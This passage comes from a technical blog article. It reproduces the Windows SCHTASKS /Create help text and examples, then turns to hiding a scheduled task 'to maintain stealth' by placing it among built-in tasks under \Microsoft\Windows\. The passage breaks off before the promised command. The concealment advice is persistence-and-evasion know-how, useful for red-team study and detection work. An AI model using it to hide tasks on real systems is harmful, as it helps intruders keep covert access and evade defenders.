    &lt;span class="na"&gt;/NP                &lt;/span&gt;&lt;span class="kd"&gt;No&lt;/span&gt; &lt;span class="kd"&gt;password&lt;/span&gt; &lt;span class="kd"&gt;is&lt;/span&gt; &lt;span class="kd"&gt;stored&lt;/span&gt;. &lt;span class="kd"&gt;The&lt;/span&gt; &lt;span class="kd"&gt;task&lt;/span&gt; &lt;span class="kd"&gt;runs&lt;/span&gt; &lt;span class="kd"&gt;non&lt;/span&gt;‑interactively &lt;span class="kd"&gt;as&lt;/span&gt; &lt;span class="kd"&gt;the&lt;/span&gt; &lt;span class="kd"&gt;given&lt;/span&gt; &lt;span class="kd"&gt;user&lt;/span&gt;. &lt;span class="kd"&gt;Only&lt;/span&gt; &lt;span class="kd"&gt;local&lt;/span&gt; &lt;span class="kd"&gt;resources&lt;/span&gt; &lt;span class="kd"&gt;are&lt;/span&gt; &lt;span class="kd"&gt;available&lt;/span&gt;.
    &lt;span class="na"&gt;/Z                 &lt;/span&gt;&lt;span class="kd"&gt;Marks&lt;/span&gt; &lt;span class="kd"&gt;the&lt;/span&gt; &lt;span class="kd"&gt;task&lt;/span&gt; &lt;span class="k"&gt;for&lt;/span&gt; &lt;span class="kd"&gt;deletion&lt;/span&gt; &lt;span class="kd"&gt;after&lt;/span&gt; &lt;span class="kd"&gt;its&lt;/span&gt; &lt;span class="kd"&gt;final&lt;/span&gt; &lt;span class="nb"&gt;run&lt;/span&gt;.
    &lt;span class="na"&gt;/XML  &lt;/span&gt;&lt;span class="kd"&gt;xmlfile&lt;/span&gt;       &lt;span class="kd"&gt;Creates&lt;/span&gt; &lt;span class="kd"&gt;a&lt;/span&gt; &lt;span class="kd"&gt;task&lt;/span&gt; &lt;span class="kd"&gt;from&lt;/span&gt; &lt;span class="kd"&gt;the&lt;/span&gt; &lt;span class="kd"&gt;task&lt;/span&gt; &lt;span class="kd"&gt;XML&lt;/span&gt; &lt;span class="kd"&gt;specified&lt;/span&gt; &lt;span class="k"&gt;in&lt;/span&gt; &lt;span class="kd"&gt;a&lt;/span&gt; &lt;span class="kd"&gt;file&lt;/span&gt;. &lt;span class="kd"&gt;Can&lt;/span&gt; &lt;span class="kd"&gt;be&lt;/span&gt; &lt;span class="kd"&gt;combined&lt;/span&gt; &lt;span class="kd"&gt;with&lt;/span&gt; &lt;span class="na"&gt;/RU &lt;/span&gt;&lt;span class="kd"&gt;and&lt;/span&gt; &lt;span class="na"&gt;/RP &lt;/span&gt;&lt;span class="kd"&gt;switches&lt;/span&gt;&lt;span class="o"&gt;,&lt;/span&gt; &lt;span class="kd"&gt;or&lt;/span&gt; &lt;span class="na"&gt;/RP &lt;/span&gt;&lt;span class="kd"&gt;alone&lt;/span&gt; &lt;span class="kd"&gt;when&lt;/span&gt; &lt;span class="kd"&gt;the&lt;/span&gt; &lt;span class="kd"&gt;task&lt;/span&gt; &lt;span class="kd"&gt;XML&lt;/span&gt; &lt;span class="kd"&gt;already&lt;/span&gt; &lt;span class="kd"&gt;contains&lt;/span&gt; &lt;span class="kd"&gt;the&lt;/span&gt; &lt;span class="kd"&gt;principal&lt;/span&gt;.
    &lt;span class="na"&gt;/V&lt;/span&gt;&lt;span class="m"&gt;1&lt;/span&gt;                &lt;span class="kd"&gt;Creates&lt;/span&gt; &lt;span class="kd"&gt;a&lt;/span&gt; &lt;span class="kd"&gt;task&lt;/span&gt; &lt;span class="kd"&gt;visible&lt;/span&gt; &lt;span class="kd"&gt;to&lt;/span&gt; &lt;span class="kd"&gt;pre&lt;/span&gt;‑Vista &lt;span class="kd"&gt;platforms&lt;/span&gt;. &lt;span class="kd"&gt;Not&lt;/span&gt; &lt;span class="kd"&gt;compatible&lt;/span&gt; &lt;span class="kd"&gt;with&lt;/span&gt; &lt;span class="na"&gt;/XML&lt;/span&gt;.
    &lt;span class="na"&gt;/F                 &lt;/span&gt;&lt;span class="kd"&gt;Forcefully&lt;/span&gt; &lt;span class="kd"&gt;creates&lt;/span&gt; &lt;span class="kd"&gt;the&lt;/span&gt; &lt;span class="kd"&gt;task&lt;/span&gt; &lt;span class="kd"&gt;and&lt;/span&gt; &lt;span class="kd"&gt;suppresses&lt;/span&gt; &lt;span class="kd"&gt;warnings&lt;/span&gt; &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="kd"&gt;the&lt;/span&gt; &lt;span class="kd"&gt;specified&lt;/span&gt; &lt;span class="kd"&gt;task&lt;/span&gt; &lt;span class="kd"&gt;already&lt;/span&gt; &lt;span class="kd"&gt;exists&lt;/span&gt;.
    &lt;span class="na"&gt;/RL   &lt;/span&gt;&lt;span class="kd"&gt;level&lt;/span&gt;        &lt;span class="kd"&gt;Sets&lt;/span&gt; &lt;span class="kd"&gt;the&lt;/span&gt; &lt;span class="nb"&gt;run&lt;/span&gt; &lt;span class="kd"&gt;level&lt;/span&gt; &lt;span class="k"&gt;for&lt;/span&gt; &lt;span class="kd"&gt;the&lt;/span&gt; &lt;span class="kd"&gt;job&lt;/span&gt;. &lt;span class="kd"&gt;Valid&lt;/span&gt; &lt;span class="kd"&gt;values&lt;/span&gt;: &lt;span class="kd"&gt;LIMITED&lt;/span&gt; &lt;span class="kd"&gt;and&lt;/span&gt; &lt;span class="kd"&gt;HIGHEST&lt;/span&gt;. &lt;span class="kd"&gt;Default&lt;/span&gt; &lt;span class="kd"&gt;is&lt;/span&gt; &lt;span class="kd"&gt;LIMITED&lt;/span&gt;.
    &lt;span class="na"&gt;/DELAY &lt;/span&gt;&lt;span class="kd"&gt;delaytime&lt;/span&gt;   &lt;span class="kd"&gt;Specifies&lt;/span&gt; &lt;span class="kd"&gt;the&lt;/span&gt; &lt;span class="kd"&gt;wait&lt;/span&gt; &lt;span class="nb"&gt;time&lt;/span&gt; &lt;span class="kd"&gt;to&lt;/span&gt; &lt;span class="kd"&gt;delay&lt;/span&gt; &lt;span class="kd"&gt;the&lt;/span&gt; &lt;span class="kd"&gt;task&lt;/span&gt; &lt;span class="kd"&gt;after&lt;/span&gt; &lt;span class="kd"&gt;the&lt;/span&gt; &lt;span class="kd"&gt;trigger&lt;/span&gt; &lt;span class="kd"&gt;fires&lt;/span&gt;. &lt;span class="kd"&gt;Time&lt;/span&gt; &lt;span class="nb"&gt;format&lt;/span&gt; &lt;span class="kd"&gt;mmmm&lt;/span&gt;&lt;span class="nl"&gt;:ss&lt;/span&gt;. &lt;span class="kd"&gt;This&lt;/span&gt; &lt;span class="kd"&gt;option&lt;/span&gt; &lt;span class="kd"&gt;is&lt;/span&gt; &lt;span class="kd"&gt;only&lt;/span&gt; &lt;span class="kd"&gt;valid&lt;/span&gt; &lt;span class="k"&gt;for&lt;/span&gt; &lt;span class="kd"&gt;schedule&lt;/span&gt; &lt;span class="kd"&gt;types&lt;/span&gt; &lt;span class="kd"&gt;ONSTART&lt;/span&gt;&lt;span class="o"&gt;,&lt;/span&gt; &lt;span class="kd"&gt;ONLOGON&lt;/span&gt;&lt;span class="o"&gt;,&lt;/span&gt; &lt;span class="kd"&gt;ONEVENT&lt;/span&gt;.
    /&lt;span class="o"&gt;?&lt;/span&gt;                 &lt;span class="kd"&gt;Displays&lt;/span&gt; &lt;span class="kd"&gt;this&lt;/span&gt; &lt;span class="nb"&gt;help&lt;/span&gt; &lt;span class="kd"&gt;message&lt;/span&gt;.

&lt;span class="kd"&gt;Modifiers&lt;/span&gt;: &lt;span class="kd"&gt;Valid&lt;/span&gt; &lt;span class="kd"&gt;values&lt;/span&gt; &lt;span class="k"&gt;for&lt;/span&gt; &lt;span class="kd"&gt;the&lt;/span&gt; &lt;span class="na"&gt;/MO &lt;/span&gt;&lt;span class="kd"&gt;switch&lt;/span&gt; &lt;span class="kd"&gt;per&lt;/span&gt; &lt;span class="kd"&gt;schedule&lt;/span&gt; &lt;span class="nb"&gt;type&lt;/span&gt;:
    &lt;span class="kd"&gt;MINUTE&lt;/span&gt;:  &lt;span class="m"&gt;1&lt;/span&gt; &lt;span class="kd"&gt;to&lt;/span&gt; &lt;span class="m"&gt;1439&lt;/span&gt; &lt;span class="kd"&gt;minutes&lt;/span&gt;.
    &lt;span class="kd"&gt;HOURLY&lt;/span&gt;:  &lt;span class="m"&gt;1&lt;/span&gt; – &lt;span class="m"&gt;23&lt;/span&gt; &lt;span class="kd"&gt;hours&lt;/span&gt;.
    &lt;span class="kd"&gt;DAILY&lt;/span&gt;:   &lt;span class="m"&gt;1&lt;/span&gt; &lt;span class="kd"&gt;to&lt;/span&gt; &lt;span class="m"&gt;365&lt;/span&gt; &lt;span class="kd"&gt;days&lt;/span&gt;.
    &lt;span class="kd"&gt;WEEKLY&lt;/span&gt;:  &lt;span class="m"&gt;1&lt;/span&gt; &lt;span class="kd"&gt;to&lt;/span&gt; &lt;span class="m"&gt;52&lt;/span&gt; &lt;span class="kd"&gt;weeks&lt;/span&gt;.
    &lt;span class="kd"&gt;ONCE&lt;/span&gt;:    &lt;span class="kd"&gt;No&lt;/span&gt; &lt;span class="kd"&gt;modifier&lt;/span&gt;.
    &lt;span class="kd"&gt;ONSTART&lt;/span&gt;: &lt;span class="kd"&gt;No&lt;/span&gt; &lt;span class="kd"&gt;modifier&lt;/span&gt;.
    &lt;span class="kd"&gt;ONLOGON&lt;/span&gt;: &lt;span class="kd"&gt;No&lt;/span&gt; &lt;span class="kd"&gt;modifier&lt;/span&gt;.
    &lt;span class="kd"&gt;ONIDLE&lt;/span&gt;:  &lt;span class="kd"&gt;No&lt;/span&gt; &lt;span class="kd"&gt;modifier&lt;/span&gt;.
    &lt;span class="kd"&gt;MONTHLY&lt;/span&gt;: &lt;span class="m"&gt;1&lt;/span&gt; &lt;span class="kd"&gt;to&lt;/span&gt; &lt;span class="m"&gt;12&lt;/span&gt;&lt;span class="o"&gt;,&lt;/span&gt; &lt;span class="kd"&gt;or&lt;/span&gt; &lt;span class="kd"&gt;FIRST&lt;/span&gt;&lt;span class="o"&gt;,&lt;/span&gt; &lt;span class="kd"&gt;SECOND&lt;/span&gt;&lt;span class="o"&gt;,&lt;/span&gt; &lt;span class="kd"&gt;THIRD&lt;/span&gt;&lt;span class="o"&gt;,&lt;/span&gt; &lt;span class="kd"&gt;FOURTH&lt;/span&gt;&lt;span class="o"&gt;,&lt;/span&gt; &lt;span class="kd"&gt;LAST&lt;/span&gt;&lt;span class="o"&gt;,&lt;/span&gt; &lt;span class="kd"&gt;LASTDAY&lt;/span&gt;.
    &lt;span class="kd"&gt;ONEVENT&lt;/span&gt;: &lt;span class="kd"&gt;XPath&lt;/span&gt; &lt;span class="kd"&gt;event&lt;/span&gt; &lt;span class="nb"&gt;query&lt;/span&gt; &lt;span class="kd"&gt;string&lt;/span&gt;.

&lt;span class="kd"&gt;Examples&lt;/span&gt;:
    &lt;span class="o"&gt;==&amp;gt;&lt;/span&gt; &lt;span class="kd"&gt;Create&lt;/span&gt; &lt;span class="kd"&gt;a&lt;/span&gt; &lt;span class="kd"&gt;scheduled&lt;/span&gt; &lt;span class="kd"&gt;task&lt;/span&gt; &lt;span class="s2"&gt;"doc"&lt;/span&gt; &lt;span class="na"&gt;on&lt;/span&gt; &lt;span class="kd"&gt;remote&lt;/span&gt; &lt;span class="kd"&gt;machine&lt;/span&gt; &lt;span class="s2"&gt;"ABC"&lt;/span&gt; &lt;span class="kd"&gt;that&lt;/span&gt; &lt;span class="kd"&gt;runs&lt;/span&gt; &lt;span class="kd"&gt;notepad&lt;/span&gt;&lt;span class="err"&gt;.exe&lt;/span&gt; &lt;span class="kd"&gt;hourly&lt;/span&gt; &lt;span class="kd"&gt;under&lt;/span&gt; &lt;span class="kd"&gt;the&lt;/span&gt; &lt;span class="s2"&gt;"runasuser"&lt;/span&gt; &lt;span class="kd"&gt;account&lt;/span&gt;.
        &lt;span class="kd"&gt;SCHTASKS&lt;/span&gt; &lt;span class="na"&gt;/Create /S &lt;/span&gt;&lt;span class="kd"&gt;ABC&lt;/span&gt; &lt;span class="na"&gt;/U &lt;/span&gt;&lt;span class="kd"&gt;user&lt;/span&gt; &lt;span class="na"&gt;/P &lt;/span&gt;&lt;span class="kd"&gt;password&lt;/span&gt; &lt;span class="na"&gt;/RU &lt;/span&gt;&lt;span class="kd"&gt;runasuser&lt;/span&gt; &lt;span class="na"&gt;/RP &lt;/span&gt;&lt;span class="kd"&gt;runaspassword&lt;/span&gt; &lt;span class="na"&gt;/SC &lt;/span&gt;&lt;span class="kd"&gt;HOURLY&lt;/span&gt; &lt;span class="na"&gt;/TN &lt;/span&gt;&lt;span class="kd"&gt;doc&lt;/span&gt; &lt;span class="na"&gt;/TR &lt;/span&gt;&lt;span class="kd"&gt;notepad&lt;/span&gt;

    &lt;span class="o"&gt;==&amp;gt;&lt;/span&gt; &lt;span class="kd"&gt;Create&lt;/span&gt; &lt;span class="kd"&gt;a&lt;/span&gt; &lt;span class="kd"&gt;scheduled&lt;/span&gt; &lt;span class="kd"&gt;task&lt;/span&gt; &lt;span class="s2"&gt;"accountant"&lt;/span&gt; &lt;span class="na"&gt;on&lt;/span&gt; &lt;span class="kd"&gt;remote&lt;/span&gt; &lt;span class="kd"&gt;machine&lt;/span&gt; &lt;span class="s2"&gt;"ABC"&lt;/span&gt; &lt;span class="kd"&gt;that&lt;/span&gt; &lt;span class="kd"&gt;runs&lt;/span&gt; &lt;span class="kd"&gt;calc&lt;/span&gt;&lt;span class="err"&gt;.exe&lt;/span&gt; &lt;span class="kd"&gt;every&lt;/span&gt; &lt;span class="kd"&gt;five&lt;/span&gt; &lt;span class="kd"&gt;minutes&lt;/span&gt; &lt;span class="kd"&gt;between&lt;/span&gt; &lt;span class="kd"&gt;a&lt;/span&gt; &lt;span class="nb"&gt;start&lt;/span&gt; &lt;span class="kd"&gt;and&lt;/span&gt; &lt;span class="kd"&gt;end&lt;/span&gt; &lt;span class="nb"&gt;time&lt;/span&gt; &lt;span class="na"&gt;on&lt;/span&gt; &lt;span class="kd"&gt;specified&lt;/span&gt; &lt;span class="kd"&gt;dates&lt;/span&gt;.
        &lt;span class="kd"&gt;SCHTASKS&lt;/span&gt; &lt;span class="na"&gt;/Create /S &lt;/span&gt;&lt;span class="kd"&gt;ABC&lt;/span&gt; &lt;span class="na"&gt;/U &lt;/span&gt;&lt;span class="kd"&gt;domain&lt;/span&gt;\user &lt;span class="na"&gt;/P &lt;/span&gt;&lt;span class="kd"&gt;password&lt;/span&gt; &lt;span class="na"&gt;/SC &lt;/span&gt;&lt;span class="kd"&gt;MINUTE&lt;/span&gt; &lt;span class="na"&gt;/MO &lt;/span&gt;&lt;span class="m"&gt;5&lt;/span&gt; &lt;span class="na"&gt;/TN &lt;/span&gt;&lt;span class="kd"&gt;accountant&lt;/span&gt; &lt;span class="na"&gt;/TR &lt;/span&gt;&lt;span class="kd"&gt;calc&lt;/span&gt;&lt;span class="err"&gt;.exe&lt;/span&gt; &lt;span class="na"&gt;/ST &lt;/span&gt;&lt;span class="m"&gt;12&lt;/span&gt;:00 &lt;span class="na"&gt;/ET &lt;/span&gt;&lt;span class="m"&gt;14&lt;/span&gt;:00 &lt;span class="na"&gt;/SD &lt;/span&gt;&lt;span class="m"&gt;06&lt;/span&gt;/06/2006 &lt;span class="na"&gt;/ED &lt;/span&gt;&lt;span class="m"&gt;06&lt;/span&gt;/06/2006 &lt;span class="na"&gt;/RU &lt;/span&gt;&lt;span class="kd"&gt;runasuser&lt;/span&gt; &lt;span class="na"&gt;/RP &lt;/span&gt;&lt;span class="kd"&gt;userpassword&lt;/span&gt;

    &lt;span class="o"&gt;==&amp;gt;&lt;/span&gt; &lt;span class="kd"&gt;Create&lt;/span&gt; &lt;span class="kd"&gt;a&lt;/span&gt; &lt;span class="kd"&gt;scheduled&lt;/span&gt; &lt;span class="kd"&gt;task&lt;/span&gt; &lt;span class="s2"&gt;"gametime"&lt;/span&gt; &lt;span class="kd"&gt;that&lt;/span&gt; &lt;span class="kd"&gt;runs&lt;/span&gt; &lt;span class="kd"&gt;FreeCell&lt;/span&gt; &lt;span class="na"&gt;on&lt;/span&gt; &lt;span class="kd"&gt;the&lt;/span&gt; &lt;span class="kd"&gt;first&lt;/span&gt; &lt;span class="kd"&gt;Sunday&lt;/span&gt; &lt;span class="kd"&gt;of&lt;/span&gt; &lt;span class="kd"&gt;every&lt;/span&gt; &lt;span class="kd"&gt;month&lt;/span&gt;.
        &lt;span class="kd"&gt;SCHTASKS&lt;/span&gt; &lt;span class="na"&gt;/Create /SC &lt;/span&gt;&lt;span class="kd"&gt;MONTHLY&lt;/span&gt; &lt;span class="na"&gt;/MO &lt;/span&gt;&lt;span class="kd"&gt;first&lt;/span&gt; &lt;span class="na"&gt;/D &lt;/span&gt;&lt;span class="kd"&gt;SUN&lt;/span&gt; &lt;span class="na"&gt;/TN &lt;/span&gt;&lt;span class="kd"&gt;gametime&lt;/span&gt; &lt;span class="na"&gt;/TR &lt;/span&gt;&lt;span class="kd"&gt;c&lt;/span&gt;:\windows\system32\freecell

    &lt;span class="o"&gt;==&amp;gt;&lt;/span&gt; &lt;span class="kd"&gt;Create&lt;/span&gt; &lt;span class="kd"&gt;a&lt;/span&gt; &lt;span class="kd"&gt;scheduled&lt;/span&gt; &lt;span class="kd"&gt;task&lt;/span&gt; &lt;span class="s2"&gt;"report"&lt;/span&gt; &lt;span class="na"&gt;on&lt;/span&gt; &lt;span class="kd"&gt;remote&lt;/span&gt; &lt;span class="kd"&gt;machine&lt;/span&gt; &lt;span class="s2"&gt;"ABC"&lt;/span&gt; &lt;span class="kd"&gt;that&lt;/span&gt; &lt;span class="kd"&gt;runs&lt;/span&gt; &lt;span class="kd"&gt;notepad&lt;/span&gt;&lt;span class="err"&gt;.exe&lt;/span&gt; &lt;span class="kd"&gt;every&lt;/span&gt; &lt;span class="kd"&gt;week&lt;/span&gt;.
        &lt;span class="kd"&gt;SCHTASKS&lt;/span&gt; &lt;span class="na"&gt;/Create /S &lt;/span&gt;&lt;span class="kd"&gt;ABC&lt;/span&gt; &lt;span class="na"&gt;/U &lt;/span&gt;&lt;span class="kd"&gt;user&lt;/span&gt; &lt;span class="na"&gt;/P &lt;/span&gt;&lt;span class="kd"&gt;password&lt;/span&gt; &lt;span class="na"&gt;/RU &lt;/span&gt;&lt;span class="kd"&gt;runasuser&lt;/span&gt; &lt;span class="na"&gt;/RP &lt;/span&gt;&lt;span class="kd"&gt;runaspassword&lt;/span&gt; &lt;span class="na"&gt;/SC &lt;/span&gt;&lt;span class="kd"&gt;WEEKLY&lt;/span&gt; &lt;span class="na"&gt;/TN &lt;/span&gt;&lt;span class="kd"&gt;report&lt;/span&gt; &lt;span class="na"&gt;/TR &lt;/span&gt;&lt;span class="kd"&gt;notepad&lt;/span&gt;&lt;span class="err"&gt;.exe&lt;/span&gt;

    &lt;span class="o"&gt;==&amp;gt;&lt;/span&gt; &lt;span class="kd"&gt;Create&lt;/span&gt; &lt;span class="kd"&gt;a&lt;/span&gt; &lt;span class="kd"&gt;scheduled&lt;/span&gt; &lt;span class="kd"&gt;task&lt;/span&gt; &lt;span class="s2"&gt;"logtracker"&lt;/span&gt; &lt;span class="na"&gt;on&lt;/span&gt; &lt;span class="kd"&gt;remote&lt;/span&gt; &lt;span class="kd"&gt;machine&lt;/span&gt; &lt;span class="s2"&gt;"ABC"&lt;/span&gt; &lt;span class="kd"&gt;that&lt;/span&gt; &lt;span class="kd"&gt;runs&lt;/span&gt; &lt;span class="kd"&gt;notepad&lt;/span&gt;&lt;span class="err"&gt;.exe&lt;/span&gt; &lt;span class="kd"&gt;every&lt;/span&gt; &lt;span class="kd"&gt;five&lt;/span&gt; &lt;span class="kd"&gt;minutes&lt;/span&gt; &lt;span class="kd"&gt;from&lt;/span&gt; &lt;span class="kd"&gt;a&lt;/span&gt; &lt;span class="kd"&gt;specified&lt;/span&gt; &lt;span class="nb"&gt;start&lt;/span&gt; &lt;span class="nb"&gt;time&lt;/span&gt; &lt;span class="kd"&gt;with&lt;/span&gt; &lt;span class="kd"&gt;no&lt;/span&gt; &lt;span class="kd"&gt;end&lt;/span&gt; &lt;span class="nb"&gt;time&lt;/span&gt;&lt;span class="o"&gt;;&lt;/span&gt; &lt;span class="kd"&gt;password&lt;/span&gt; &lt;span class="nb"&gt;prompt&lt;/span&gt; &lt;span class="k"&gt;for&lt;/span&gt; &lt;span class="na"&gt;/RP&lt;/span&gt;.
        &lt;span class="kd"&gt;SCHTASKS&lt;/span&gt; &lt;span class="na"&gt;/Create /S &lt;/span&gt;&lt;span class="kd"&gt;ABC&lt;/span&gt; &lt;span class="na"&gt;/U &lt;/span&gt;&lt;span class="kd"&gt;domain&lt;/span&gt;\user &lt;span class="na"&gt;/P &lt;/span&gt;&lt;span class="kd"&gt;password&lt;/span&gt; &lt;span class="na"&gt;/SC &lt;/span&gt;&lt;span class="kd"&gt;MINUTE&lt;/span&gt; &lt;span class="na"&gt;/MO &lt;/span&gt;&lt;span class="m"&gt;5&lt;/span&gt; &lt;span class="na"&gt;/TN &lt;/span&gt;&lt;span class="kd"&gt;logtracker&lt;/span&gt; &lt;span class="na"&gt;/TR &lt;/span&gt;&lt;span class="kd"&gt;c&lt;/span&gt;:\windows\system32\notepad.exe &lt;span class="na"&gt;/ST &lt;/span&gt;&lt;span class="m"&gt;18&lt;/span&gt;:30 &lt;span class="na"&gt;/RU &lt;/span&gt;&lt;span class="kd"&gt;runasuser&lt;/span&gt; &lt;span class="na"&gt;/RP

    &lt;/span&gt;&lt;span class="o"&gt;==&amp;gt;&lt;/span&gt; &lt;span class="kd"&gt;Create&lt;/span&gt; &lt;span class="kd"&gt;a&lt;/span&gt; &lt;span class="kd"&gt;scheduled&lt;/span&gt; &lt;span class="kd"&gt;task&lt;/span&gt; &lt;span class="s2"&gt;"gaming"&lt;/span&gt; &lt;span class="kd"&gt;that&lt;/span&gt; &lt;span class="kd"&gt;runs&lt;/span&gt; &lt;span class="kd"&gt;freecell&lt;/span&gt;&lt;span class="err"&gt;.exe&lt;/span&gt; &lt;span class="kd"&gt;daily&lt;/span&gt; &lt;span class="kd"&gt;from&lt;/span&gt; &lt;span class="m"&gt;12&lt;/span&gt;:00 &lt;span class="kd"&gt;to&lt;/span&gt; &lt;span class="m"&gt;14&lt;/span&gt;:00 &lt;span class="kd"&gt;and&lt;/span&gt; &lt;span class="kd"&gt;ends&lt;/span&gt; &lt;span class="kd"&gt;automatically&lt;/span&gt;.
        &lt;span class="kd"&gt;SCHTASKS&lt;/span&gt; &lt;span class="na"&gt;/Create /SC &lt;/span&gt;&lt;span class="kd"&gt;DAILY&lt;/span&gt; &lt;span class="na"&gt;/TN &lt;/span&gt;&lt;span class="kd"&gt;gaming&lt;/span&gt; &lt;span class="na"&gt;/TR &lt;/span&gt;&lt;span class="kd"&gt;c&lt;/span&gt;:\freecell &lt;span class="na"&gt;/ST &lt;/span&gt;&lt;span class="m"&gt;12&lt;/span&gt;:00 &lt;span class="na"&gt;/ET &lt;/span&gt;&lt;span class="m"&gt;14&lt;/span&gt;:00 &lt;span class="na"&gt;/K

    &lt;/span&gt;&lt;span class="o"&gt;==&amp;gt;&lt;/span&gt; &lt;span class="kd"&gt;Create&lt;/span&gt; &lt;span class="kd"&gt;a&lt;/span&gt; &lt;span class="kd"&gt;scheduled&lt;/span&gt; &lt;span class="kd"&gt;task&lt;/span&gt; &lt;span class="s2"&gt;"EventLog"&lt;/span&gt; &lt;span class="kd"&gt;to&lt;/span&gt; &lt;span class="nb"&gt;start&lt;/span&gt; &lt;span class="kd"&gt;wevtvwr&lt;/span&gt;.msc &lt;span class="kd"&gt;whenever&lt;/span&gt; &lt;span class="kd"&gt;event&lt;/span&gt; &lt;span class="m"&gt;101&lt;/span&gt; &lt;span class="kd"&gt;is&lt;/span&gt; &lt;span class="kd"&gt;published&lt;/span&gt; &lt;span class="k"&gt;in&lt;/span&gt; &lt;span class="kd"&gt;the&lt;/span&gt; &lt;span class="s2"&gt;"System"&lt;/span&gt; &lt;span class="kd"&gt;channel&lt;/span&gt;.
        &lt;span class="kd"&gt;SCHTASKS&lt;/span&gt; &lt;span class="na"&gt;/Create /TN &lt;/span&gt;&lt;span class="kd"&gt;EventLog&lt;/span&gt; &lt;span class="na"&gt;/TR &lt;/span&gt;&lt;span class="kd"&gt;wevtvwr&lt;/span&gt;.msc &lt;span class="na"&gt;/SC &lt;/span&gt;&lt;span class="kd"&gt;ONEVENT&lt;/span&gt; &lt;span class="na"&gt;/EC &lt;/span&gt;&lt;span class="kd"&gt;System&lt;/span&gt; &lt;span class="na"&gt;/MO &lt;/span&gt;&lt;span class="o"&gt;*[&lt;/span&gt;&lt;span class="kd"&gt;System&lt;/span&gt;&lt;span class="na"&gt;/EventID&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="m"&gt;101&lt;/span&gt;&lt;span class="o"&gt;]&lt;/span&gt;

    &lt;span class="o"&gt;==&amp;gt;&lt;/span&gt; &lt;span class="kd"&gt;File&lt;/span&gt; &lt;span class="kd"&gt;paths&lt;/span&gt; &lt;span class="kd"&gt;may&lt;/span&gt; &lt;span class="kd"&gt;contain&lt;/span&gt; &lt;span class="kd"&gt;spaces&lt;/span&gt;&lt;span class="o"&gt;;&lt;/span&gt; &lt;span class="kd"&gt;use&lt;/span&gt; &lt;span class="kd"&gt;two&lt;/span&gt; &lt;span class="kd"&gt;sets&lt;/span&gt; &lt;span class="kd"&gt;of&lt;/span&gt; &lt;span class="kd"&gt;quotes&lt;/span&gt;—one &lt;span class="k"&gt;for&lt;/span&gt; &lt;span class="kd"&gt;CMD&lt;/span&gt;&lt;span class="err"&gt;.EXE&lt;/span&gt; &lt;span class="kd"&gt;and&lt;/span&gt; &lt;span class="kd"&gt;one&lt;/span&gt; &lt;span class="k"&gt;for&lt;/span&gt; &lt;span class="kd"&gt;SchTasks&lt;/span&gt;&lt;span class="err"&gt;.exe&lt;/span&gt;. &lt;span class="kd"&gt;The&lt;/span&gt; &lt;span class="kd"&gt;outer&lt;/span&gt; &lt;span class="kd"&gt;quotes&lt;/span&gt; &lt;span class="k"&gt;for&lt;/span&gt; &lt;span class="kd"&gt;CMD&lt;/span&gt; &lt;span class="kd"&gt;must&lt;/span&gt; &lt;span class="kd"&gt;be&lt;/span&gt; &lt;span class="kd"&gt;double&lt;/span&gt; &lt;span class="kd"&gt;quotes&lt;/span&gt;&lt;span class="o"&gt;;&lt;/span&gt; &lt;span class="kd"&gt;inner&lt;/span&gt; &lt;span class="kd"&gt;quotes&lt;/span&gt; &lt;span class="kd"&gt;can&lt;/span&gt; &lt;span class="kd"&gt;be&lt;/span&gt; &lt;span class="kd"&gt;single&lt;/span&gt; &lt;span class="kd"&gt;or&lt;/span&gt; &lt;span class="kd"&gt;escaped&lt;/span&gt; &lt;span class="kd"&gt;double&lt;/span&gt; &lt;span class="kd"&gt;quotes&lt;/span&gt;:
        &lt;span class="kd"&gt;SCHTASKS&lt;/span&gt; &lt;span class="na"&gt;/Create /tr &lt;/span&gt;&lt;span class="s2"&gt;"'c:\program files\internet explorer\iexplorer.exe' \"&lt;/span&gt;&lt;span class="kd"&gt;c&lt;/span&gt;:\log &lt;span class="kd"&gt;data&lt;/span&gt;\today.xml\&lt;span class="s2"&gt;""&lt;/span&gt; ...
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The "Task Scheduler Library" contains folders. In a pristine Windows installation, there are no scheduled tasks in the root directory, as shown:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Facyvs1577fkm94w3g7jq.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Facyvs1577fkm94w3g7jq.png" alt=" " width="800" height="335"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Naturally, subdirectories are also empty:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F0hf7pd7efkwh9d4qyd4o.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F0hf7pd7efkwh9d4qyd4o.png" alt=" " width="800" height="270"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fcqk2rnx8u8lf253wzvgx.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fcqk2rnx8u8lf253wzvgx.png" alt=" " width="800" height="347"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;All built‑in tasks reside deep within nested folders. To maintain stealth, it is advisable to adhere to the default Windows convention by creating our own subdirectory and task under &lt;code&gt;\Microsoft\Windows\&lt;/code&gt;. Example command:&lt;/p&gt;

